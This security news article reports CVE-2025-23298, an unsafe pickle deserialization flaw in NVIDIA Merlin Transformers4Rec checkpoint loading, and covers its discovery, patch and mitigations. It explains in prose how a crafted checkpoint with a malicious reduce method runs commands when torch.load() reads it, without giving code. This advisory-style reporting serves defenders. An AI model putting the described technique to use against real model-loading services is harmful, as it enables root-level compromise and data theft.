NVIDIA Merlin Flaw Enables Remote Code Execution with Root Access


A critical vulnerability in NVIDIA’s Merlin Transformers4Rec library allows attackers to achieve remote code execution with root privileges.

Discovered by the Trend Micro Zero Day Initiative (ZDI) Threat Hunting Team, the flaw stems from unsafe deserialization in the model checkpoint loading functionality.

Tracked as CVE-2025-23298, this vulnerability underscores the persistent security challenges in machine learning frameworks that rely on Python’s pickle serialization.

Discovery of Unsafe Deserialization

While auditing ML/AI frameworks for supply chain risks, ZDI researchers focused on how models are persisted and loaded.

In Transformers4Rec’s load_model_trainer_states_from_checkpoint function, PyTorch’s torch.load() is used without sandboxing or class restrictions.

CVE Affected Product Impact CVSS 3.1 Score
CVE-2025-23298 NVIDIA Merlin Transformers4Rec Remote Code Execution as root 9.8

Because torch.load() uses Python’s pickle protocol, it can execute arbitrary code during deserialization.

ZDI confirmed that loading a crafted checkpoint file could trigger root-level commands immediately when restoring model state.

To demonstrate the risk, the research team built a malicious checkpoint object whose reduce method invokes system commands.

When torch.save() writes the malicious object into a checkpoint and torch.load() later reads it, the attacker’s payload runs before any model weights are processed.

In production environments where ML services often run with elevated privileges this leads to full system compromise.

The exploit can exfiltrate data, install backdoors, and pivot to other systems within the network.

NVIDIA patched the vulnerability in Transformers4Rec commit b7eaea5 (PR #802), replacing direct pickle calls with a custom loader that restricts deserialization to approved classes.

The new implementation uses a secure load() function in serialization.py to validate object types before restoration.

To prevent similar issues, developers should avoid untrusted pickle data, use PyTorch’s weights_only=True option, and adopt safer formats such as safetensors or ONNX.

Organizations must enforce model provenance checks, sign checkpoints cryptographically, and sandbox model loading.

This vulnerability highlights the urgent need for secure serialization standards in ML/AI ecosystems and demonstrates that pickle-based workflows remain a critical attack vector despite long-standing community warnings.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.



Source link

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.